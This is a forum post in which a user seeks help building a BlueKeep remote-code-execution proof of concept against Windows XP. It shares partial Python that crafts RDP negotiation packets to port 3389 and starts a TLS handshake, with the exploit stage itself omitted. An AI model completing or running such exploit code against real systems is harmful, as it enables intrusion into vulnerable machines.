Jump to content
Sign in to follow this  
alessandroschino

BlueKeep PoC

Recommended Posts

alessandroschino

Hi guys,

I'm trying to develop a working PoC for causing an RCE ( Remote Code Execution ) exploiting BlueKeep vulnerability in Windows XP  .

The vulnerability is in RDP service. 

In the source code I'm trying to establish an initial ssl connection to the host . Here is  a part of the source code 

from OpenSSL import SSL

#skipped part of not relevant source code
"..."
"..."
"..."
"..."

class TPKT(Structure):
    commonHdr = (
        ('Version', 'B=3'),
        ('Reserved', 'B=0'),
        ('Length', '>H=len(TPDU)+4'),
        ('_TPDU', '_-TPDU', 'self["Length"]-4'),
        ('TPDU', ':=""'),
    )


class TPDU(Structure):
    commonHdr = (
        ('LengthIndicator', 'B=len(VariablePart)+1'),
        ('Code', 'B=0'),
        ('VariablePart', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        self['VariablePart'] = ''


class CR_TPDU(Structure):
    commonHdr = (
        ('DST-REF', '<H=0'),
        ('SRC-REF', '<H=0'),
        ('CLASS-OPTION', 'B=0'),
        ('Type', 'B=0'),
        ('Flags', 'B=0'),
        ('Length', '<H=8'),
    )


class DATA_TPDU(Structure):
    commonHdr = (
        ('EOT', 'B=0x80'),
        ('UserData', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        self['UserData'] = ''


class RDP_NEG_REQ(CR_TPDU):
    structure = (
        ('requestedProtocols', '<L'),
    )

    def __init__(self, data=None):
        CR_TPDU.__init__(self, data)
        if data is None:
            self['Type'] = 1

#skipped part of not relevant source code
"..."
"..."
"..."
"..."

def send_initialization_pdu_packet(host):
    """
    initialize the RDP request
    """
    
    tpkt = TPKT()
    tpdu = TPDU()
    rdp_neg = RDP_NEG_REQ()
    rdp_neg['Type'] = 1
    rdp_neg['requestedProtocols'] = 1
    tpdu['VariablePart'] = rdp_neg.getData()
    tpdu['Code'] = 0xe0
    tpkt['TPDU'] = tpdu.getData()
    # start the session
    session = socket.socket()
    session.connect((host, 3389))
    session.sendall(tpkt.getData())
    results = session.recv(8192)
    
    print("[@] received: {}".format(repr(results)))
    # turn the session into a SSL connection
    ctx = SSL.Context(SSL.TLSv1_METHOD)
    tls = SSL.Connection(ctx, session)
    tls.set_connect_state()
    # handshake
    tls.do_handshake()
    print("Handshake done")
    return tls

Now the error occours when tls.do_handshake() is called. The error says "104", "ECONNRESET". I think his means that the connection was reset by peer. If I try this with a Windows 7 machine it works, but with a Windows XP machine it gives me that error. I've tried to use a different SSL Context but the problem still persist. I don't know if, maybe, the configuration of the TPKT isn't correct for Windows XP and so the connection is closed. 

Does anyone know what kind of problem it could be?

 

PS for more info please pm me ;) 

Share this post


Link to post
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  

×